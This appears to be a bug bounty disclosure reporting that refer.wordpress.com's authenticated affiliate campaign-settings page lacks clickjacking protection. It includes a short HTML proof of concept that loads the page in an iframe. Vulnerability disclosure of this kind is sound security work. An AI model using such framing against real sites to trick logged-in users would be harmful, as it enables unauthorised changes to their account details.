Modify account details by exploiting clickjacking vulnerability on refer.wordpress.com

## Summary: I have found that their is no protection for click jacking on refer.wordpress.com so attacker can exploit it to change users details. This clickjacking is on authenticated pages so it is very critical vulnerability. ## Steps To Reproduce: 1. Create a HTML file with following content ``` <html> <title>Clickjacking</title> <body> <iframe src="https://refer.wordpress.com/affiliate-network/campaign-settings/"></iframe> </body> </html> ``` 1. Open the above created HTML file in browser and, 1. You will find that your website will be loaded in browser without any protection such as Iframe ## Supporting Material/References: * {F670239} ## Impact Modify account details by exploiting click jacking vulnerability